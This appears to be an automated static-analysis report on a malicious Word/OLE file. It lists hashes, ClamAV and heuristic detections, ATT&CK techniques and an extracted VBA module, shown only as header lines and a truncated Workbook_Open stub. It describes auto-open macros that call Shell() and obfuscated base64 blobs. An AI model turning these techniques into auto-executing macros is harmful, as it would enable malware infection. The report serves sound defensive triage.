Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8f52e9d279f9bcb…

MALICIOUS

Office (OLE)

Size: 108.0 KB
Created: 2018-03-01 05:56:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 928cf0b83fc5858cf94e29bbb553c2d2
SHA-1: aed17cf9f4c6af3fca617750d4c782e36db6fc08
SHA-256: e8f52e9d279f9bcbf95a6b4df9e1fdee7d582fb6e37a3861d5b62e13ea9a8772
Risk score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The file contains VBA macros, including a Workbook_Open macro, a common technique for executing malicious code as soon as the document is opened. The critical heuristic for a Shell() call in VBA indicates that the macro likely attempts to execute an external command or download a payload. The ClamAV detection further confirms its malicious nature. The presence of a 'macros.bas' file indicates that the macro code itself was carved out as a separate module.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
    Workbook_Open macro
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16419 bytes
SHA-256: de12dab77dcdb784188f68663592cbf46637efa093ed7943c6901b5e4bcb34ec
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 58 long base64-like blob(s))
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
... (truncated)